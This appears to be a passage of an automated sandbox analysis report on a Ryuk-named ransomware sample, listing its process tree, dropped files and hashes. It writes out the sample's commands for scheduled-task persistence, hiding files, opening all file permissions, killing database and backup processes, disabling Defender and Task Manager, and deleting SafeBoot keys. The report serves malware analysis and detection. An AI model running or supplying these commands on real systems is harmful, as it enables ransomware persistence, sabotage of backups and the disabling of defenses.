schtasks.exe PID 528 wrote to memory of 1732 528 cmd.exe schtasks.exe PID 528 wrote to memory of 1732 528 cmd.exe schtasks.exe PID 860 wrote to memory of 700 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 700 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 700 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 700 wrote to memory of 1784 700 cmd.exe attrib.exe PID 700 wrote to memory of 1784 700 cmd.exe attrib.exe PID 700 wrote to memory of 1784 700 cmd.exe attrib.exe PID 860 wrote to memory of 1376 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1376 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1376 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 1376 wrote to memory of 460 1376 cmd.exe attrib.exe PID 1376 wrote to memory of 460 1376 cmd.exe attrib.exe PID 1376 wrote to memory of 460 1376 cmd.exe attrib.exe PID 860 wrote to memory of 288 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 288 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 288 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 288 wrote to memory of 1012 288 cmd.exe cmd.exe PID 288 wrote to memory of 1012 288 cmd.exe cmd.exe PID 288 wrote to memory of 1012 288 cmd.exe cmd.exe PID 860 wrote to memory of 540 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 540 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 540 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1432 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1432 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 860 wrote to memory of 1432 860 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe cmd.exe PID 540 wrote to memory of 304 540 cmd.exe reg.exe PID 540 wrote to memory of 304 540 cmd.exe reg.exe PID 540 wrote to memory of 304 540 cmd.exe reg.exe PID 1432 wrote to memory of 1192 1432 cmd.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 596 attrib.exe 1784 attrib.exe 460 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\RYUKIDFilesize
8B
MD5f7c9aa8109768d75ea7402cb915b51be
SHA1cc649a88c2266ae98c2c378a138329e9dcf1832a
SHA256a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
SHA512bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7
-
C:\ProgramData\RyukReadMe.txtFilesize
1KB
MD5e5776afce2e7d6fa4feb7a0c4bc2e004
SHA18b3cd15a7e34d4b1c0800dad92a07c60647f44dd
SHA2564ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7
SHA512d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5bf3dc7e7792a2b38f146440ad4f79a22
SHA1a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA51204cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805
-
C:\ProgramData\hrmlog1Filesize
2KB
MD5bf3dc7e7792a2b38f146440ad4f79a22
SHA1a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA51204cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805
-
C:\ProgramData\hrmlog2Filesize
292B
MD59dbd99471b38780584934dce1c838dc8
SHA18826b382ab74a575991fc5a5747bea695913199b
SHA25602c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA51201f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b
-
C:\ProgramData\hrmlog2Filesize
292B
MD59dbd99471b38780584934dce1c838dc8
SHA18826b382ab74a575991fc5a5747bea695913199b
SHA25602c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA51201f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b
-
C:\ProgramData\ryuk.exeFilesize
885KB
MD5a650d5676dc2c91a3af2216044ddaf8c
SHA1851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
-
C:\Users\Admin\AppData\Local\Temp\RYUKIDFilesize
8B
MD5f7c9aa8109768d75ea7402cb915b51be
SHA1cc649a88c2266ae98c2c378a138329e9dcf1832a
SHA256a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
SHA512bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1Filesize
2KB
MD5bf3dc7e7792a2b38f146440ad4f79a22
SHA1a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA51204cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2Filesize
292B
MD59dbd99471b38780584934dce1c838dc8
SHA18826b382ab74a575991fc5a5747bea695913199b
SHA25602c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA51201f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exeFilesize
885KB
MD5a650d5676dc2c91a3af2216044ddaf8c
SHA1851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
-
memory/268-58-0x0000000000000000-mapping.dmp
-
memory/288-72-0x0000000000000000-mapping.dmp
-
memory/304-76-0x0000000000000000-mapping.dmp
-
memory/332-61-0x0000000000000000-mapping.dmp
-
memory/460-71-0x0000000000000000-mapping.dmp
-
memory/528-66-0x0000000000000000-mapping.dmp
-
memory/540-74-0x0000000000000000-mapping.dmp
-
memory/580-98-0x0000000000000000-mapping.dmp
-
memory/588-60-0x0000000000000000-mapping.dmp
-
memory/596-62-0x0000000000000000-mapping.dmp
-
memory/612-64-0x0000000000000000-mapping.dmp
-
memory/700-68-0x0000000000000000-mapping.dmp
-
memory/840-54-0x0000000000000000-mapping.dmp
-
memory/860-103-0x000007FEFB741000-0x000007FEFB743000-memory.dmpFilesize
8KB
-
memory/1012-73-0x0000000000000000-mapping.dmp
-
memory/1036-97-0x0000000000000000-mapping.dmp
-
memory/1040-99-0x0000000000000000-mapping.dmp
-
memory/1192-77-0x0000000000000000-mapping.dmp
-
memory/1376-70-0x0000000000000000-mapping.dmp
-
memory/1384-101-0x0000000000000000-mapping.dmp
-
memory/1420-93-0x0000000000000000-mapping.dmp
-
memory/1432-75-0x0000000000000000-mapping.dmp
-
memory/1516-65-0x0000000000000000-mapping.dmp
-
memory/1528-102-0x0000000000000000-mapping.dmp
-
memory/1528-59-0x0000000000000000-mapping.dmp
-
memory/1568-87-0x0000000000000000-mapping.dmp
-
memory/1648-91-0x0000000000000000-mapping.dmp
-
memory/1660-78-0x0000000000000000-mapping.dmp
-
memory/1728-100-0x0000000000000000-mapping.dmp
-
memory/1732-67-0x0000000000000000-mapping.dmp
-
memory/1736-56-0x0000000000000000-mapping.dmp
-
memory/1784-69-0x0000000000000000-mapping.dmp
-
memory/1892-95-0x0000000000000000-mapping.dmp
-
memory/1912-84-0x0000000000000000-mapping.dmp
-
memory/1944-79-0x0000000000000000-mapping.dmp
-
memory/2004-96-0x0000000000000000-mapping.dmp
-
memory/2012-80-0x0000000000000000-mapping.dmp
-
memory/2024-83-0x0000000000000000-mapping.dmp
-
memory/2044-55-0x0000000000000000-mapping.dmp